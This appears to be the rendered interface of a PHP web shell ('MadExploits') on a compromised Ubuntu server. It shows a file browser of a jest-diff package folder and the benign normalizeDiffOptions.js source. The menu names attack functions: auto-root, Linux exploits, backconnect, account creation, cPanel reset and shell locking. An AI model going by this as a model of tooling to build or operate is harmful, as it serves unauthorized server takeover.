Linux ubuntu22 5.15.0-133-generic #144-Ubuntu SMP Fri Feb 7 20:47:38 UTC 2025 x86_64
nginx/1.18.0
: 128.199.27.159 | : 216.73.216.52
Cant Read [ /etc/named.conf ]
8.1.31
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
amatya /
quiz1 /
node_modules /
jest-diff /
build /
[ HOME SHELL ]
Name
Size
Permission
Action
cleanupSemantic.d.ts
2.18
KB
-rw-rw-rw-
cleanupSemantic.js
20.13
KB
-rw-rw-rw-
constants.d.ts
341
B
-rw-rw-rw-
constants.js
662
B
-rw-rw-rw-
diffLines.d.ts
857
B
-rw-rw-rw-
diffLines.js
5.74
KB
-rw-rw-rw-
diffStrings.d.ts
346
B
-rw-rw-rw-
diffStrings.js
1.86
KB
-rw-rw-rw-
getAlignedDiffs.d.ts
432
B
-rw-rw-rw-
getAlignedDiffs.js
7.07
KB
-rw-rw-rw-
index.d.ts
792
B
-rw-rw-rw-
index.js
6.84
KB
-rw-rw-rw-
joinAlignedDiffs.d.ts
526
B
-rw-rw-rw-
joinAlignedDiffs.js
7.65
KB
-rw-rw-rw-
normalizeDiffOptions.d.ts
428
B
-rw-rw-rw-
normalizeDiffOptions.js
1.76
KB
-rw-rw-rw-
printDiffs.d.ts
500
B
-rw-rw-rw-
printDiffs.js
2.5
KB
-rw-rw-rw-
types.d.ts
1.56
KB
-rw-rw-rw-
types.js
14
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : normalizeDiffOptions.js
'use strict'; Object.defineProperty(exports, '__esModule', { value: true }); exports.normalizeDiffOptions = exports.noColor = void 0; var _chalk = _interopRequireDefault(require('chalk')); function _interopRequireDefault(obj) { return obj && obj.__esModule ? obj : {default: obj}; } /** * Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved. * * This source code is licensed under the MIT license found in the * LICENSE file in the root directory of this source tree. */ const noColor = string => string; exports.noColor = noColor; const DIFF_CONTEXT_DEFAULT = 5; const OPTIONS_DEFAULT = { aAnnotation: 'Expected', aColor: _chalk.default.green, aIndicator: '-', bAnnotation: 'Received', bColor: _chalk.default.red, bIndicator: '+', changeColor: _chalk.default.inverse, changeLineTrailingSpaceColor: noColor, commonColor: _chalk.default.dim, commonIndicator: ' ', commonLineTrailingSpaceColor: noColor, compareKeys: undefined, contextLines: DIFF_CONTEXT_DEFAULT, emptyFirstOrLastLinePlaceholder: '', expand: true, includeChangeCounts: false, omitAnnotationLines: false, patchColor: _chalk.default.yellow }; const getCompareKeys = compareKeys => compareKeys && typeof compareKeys === 'function' ? compareKeys : OPTIONS_DEFAULT.compareKeys; const getContextLines = contextLines => typeof contextLines === 'number' && Number.isSafeInteger(contextLines) && contextLines >= 0 ? contextLines : DIFF_CONTEXT_DEFAULT; // Pure function returns options with all properties. const normalizeDiffOptions = (options = {}) => ({ ...OPTIONS_DEFAULT, ...options, compareKeys: getCompareKeys(options.compareKeys), contextLines: getContextLines(options.contextLines) }); exports.normalizeDiffOptions = normalizeDiffOptions;
Close